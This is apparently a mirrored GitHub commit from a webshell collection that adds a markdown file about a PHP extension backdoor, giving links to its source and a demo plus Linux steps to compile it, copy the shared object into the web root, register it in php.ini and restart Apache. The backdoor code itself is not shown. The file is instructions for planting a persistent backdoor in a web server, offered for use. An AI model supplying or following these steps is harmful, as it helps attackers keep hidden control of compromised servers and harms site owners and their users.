mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
add php-extension-backdoor
This commit is contained in:
parent
20ca43514c
commit
5fc033c147
1 changed files with 20 additions and 0 deletions
20
php/php-extension-backdoor.md
Normal file
20
php/php-extension-backdoor.md
Normal file
|
@ -0,0 +1,20 @@
|
|||
author:akamajoris
|
||||
|
||||
url:https://github.com/akamajoris/php-extension-backdoor
|
||||
|
||||
Windows: http://stackoff.ru/pishem-rasshirenie-bekdor-dlya-php/
|
||||
|
||||
Linux:
|
||||
sudo apt-get install php5-dev
|
||||
phpize && ./configure && make
|
||||
|
||||
chmod xxx.so
|
||||
copy xxx.so to /var/www
|
||||
|
||||
edit php.ini
|
||||
add extension=/var/www/xxx.so
|
||||
restart apache
|
||||
|
||||
test success!! ^_^
|
||||
|
||||
demo:http://drops.wooyun.org/tips/3003
|
Loading…
Reference in a new issue